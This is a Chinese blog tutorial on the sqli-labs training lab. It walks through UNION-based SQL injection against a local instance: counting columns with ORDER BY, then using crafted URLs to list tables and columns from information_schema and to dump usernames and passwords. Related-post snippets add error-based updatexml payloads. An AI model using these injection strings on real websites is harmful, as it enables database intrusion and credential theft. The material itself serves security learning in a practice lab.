sqlli-labs基本使用

已于 2023-03-04 20:26:26 修改
阅读量953 收藏
点赞数
分类专栏: 安全 文章标签: sql 数据库 mysql
于 2023-03-04 18:25:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011417723/article/details/129329181
版权

1.安装hackbar插件

链接:https://pan.baidu.com/s/1-QIYmAU-BV_DEONfxovizQ
提取码:dc66
在这里插入图片描述

2.SQL注入表信息解析(案例使用的sqlli-labs自带的数据库security)

2.1 通过order by 判断表有多少列

分析表有多少列(通过order by 列数 不断尝试,直到报错为止),如下图判断出该表有三列
在这里插入图片描述

2.2 有回显点,则通过union屏蔽连接左侧的sql,只执行自己的sql

通过将id赋为错误的数据将sql左侧的数据屏蔽,后面可以根据系统自带的信息来进行分析
通过 select user()用户信息 database()数据库 version()版本
在这里插入图片描述

2.3 获取数据库表的所有信息在这里插入图片描述

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where TABLE_SCHEMA=database()
  • group_concat():是将此列的所有数据一行显示出来,如不加此函数,只会显示一个表名信息。
  • information_schema:高版本5.0以上均有该系统表,通过select version()知道数据库的版本,则知道该版本所对应的系统表的结构。

2.4 获取指定表中所有列的信息

通过系统自带函数information_schema.COLUMNS
在这里插入图片描述

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users'

2.5 获取表中所有数据

已知表中字段,通过group_concat获取表中列的所有信息(0x3a为16进制的冒号,作为显示分隔使用)
在这里插入图片描述

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(username,0x3a,password),3 from users
疯狂的大饼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs(1-5)详解,最详细小白必看
u258710的博客
06-19 2771
1Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 输入http://192.168.67.134/sqli/Less-1/?id=1’ 我们发现返回ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’
安装upload-labs
10-22
upload-labs的使用方法 1. 学习文件上传漏洞课程:upload-labs提供了详细的课程讲解文件上传漏洞的基础知识和实践经验,您可以通过学习这些课程来了解文件上传漏洞的原理和防御方法。 2. 根据关卡提示信息练习:...
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
sqli-labs最详细指南1-6
m0_59206144的博客
09-07 847
发现可行后,重复以上注入步骤。发现可行后,继续常规注入。
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
最新发布
m0_60721649的博客
04-08 818
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqli-labs闯关指南 1—10
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
sqli-labs 纯小白入门教程
weixin_30483495的博客
09-18 308
SQLI-LABS LESS-1 安装好sqli-labs的实验环境,进行实验。 判断是否存在sql注入的条件 构造数字传参 正常 构造单引号情况 出现报错, 确定字段数 利用order by语句进行查询我们能够确...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli-labs之前,需要了解为什么要使用本地Web靶场。随着网络安全威胁的增加...
SQLi Labs实验指导书
11-02
SQLi Labs 通关过程 最好的文档,1-37课解答过程,言简意赅。大佬对不住,我把你的辛苦拿来换币了
sqli-labs注入方法总结
wutiangui的博客
09-23 245
用户名:1" ) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(用户名:1’) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(用户名:1" union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+删除bp原先的cookie,使用以下语句。
sqli-labs详解------持续更新
yuqie的博客
06-20 2689
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
Sqlilab通关教程
weixin_62281892的博客
05-17 1571
第一关:基于单引号的字符型注入 目录 第一关:基于单引号的字符型注入 先进行输入参数?id=1' 出现报错说明发现注入点,判断该类型为字符注入 order by 判断数据库--表--表里面的数据的列进行排序(从1开始) union select 1,2,3 -- 判断数据显示点 select system_user() 显示系统用户 select version() 显示版本信息 select @@datadir 数据库的安装路径 *查库: select schema_na
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用SQL注入手工
sqlilabs教程2(详解)
qq_40591440的博客
11-17 266
用到的知识详解: 在Sqlilabs 中经常可以看到- -+ 号来注释多余的部分而mysql中的# / --缺不能直接使用 因为:URL中#用来指导浏览器动作,用作锚点的连接。所以发送的请求中不会包含#号,可以将#换做 url编码的%23就可以了,而 -- 在使用的的时候,-- 与后面的 ’ 连接在一起无法形成有效的mysql语句 所以在使用的时候 可以使用--+ UNION 操作符用于合并两个或多个 SELECT 语句的结果集 select 123 详解 下图在上面的详情中截取 由此图可知 1,2,
Sqlli_Lab_Page_1_Less_2
qq_45434762的博客
10-21 472
1.找注入点 正常显示 正常显示 显示异常,说明存在诸如点 2.求列数 不存在 判断出列数为3列 3.求显示位 没有报错显示,再1前面加一个-再次尝试 显示位为2,3 4.查看库名,连接数据库的用户等信息 5.求表名 6.求列名 7.拖库 ...
sqlilabs1-20详细教程
黑白的博客
10-06 8182
声明 学习SQL注入 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show databases;
upload-labs使用
07-25
上传成功后,可以使用蚁剑等工具进行连接。 #### 引用[.reference_title] - *1* [upload-labs初学者通关详解](https://blog.csdn.net/weixin_54072578/article/details/121108379)[target="_blank" data-report-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值